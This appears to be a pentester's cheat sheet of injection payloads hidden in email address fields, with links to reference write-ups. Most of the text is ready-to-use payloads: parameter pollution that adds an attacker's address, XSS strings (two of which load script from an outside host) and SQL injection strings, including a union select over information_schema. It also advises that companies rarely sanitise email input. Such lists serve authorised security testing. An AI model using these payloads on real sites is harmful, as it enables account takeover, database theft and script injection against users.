Email injections

user[email][]=valid@email.com&user[email][]=attacker@email.com

XSS

"<script src=//xsshere?"@email.com

"><Svg/OnLoad=alert(1)>"@gmail.com
"><svg/onload=confirm(1)>"@x.y

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

"><img/src/onerror=import('//domain/')>"@yourdomain.com

XSS

SQL Injection

SQL Injection

"1-'or'1'='1"@email.com

john.doe+intigriti' or/**/1/**/=/**/--@example.com

johne.doe+intigriti'/**/or/**/1/**/=/**/1/**/--@example.com

test+intigiriti'/**/union/**/select/**/table_name/**/from/**/information_schema.tables--@test.test

Email Injections | HackTricks

Bypassing Email Filter which leads to SQL InjectionMedium

Bypass Access Control

Splitting the email atom: exploiting parsers to bypass access controlsPortSwigger Research

HTML injection - Subscription form

Email HTML injection with a simple tipMedium

Resources

hacktricks/pentesting-web/email-injections.md at master · HackTricks-wiki/hacktricksGitHub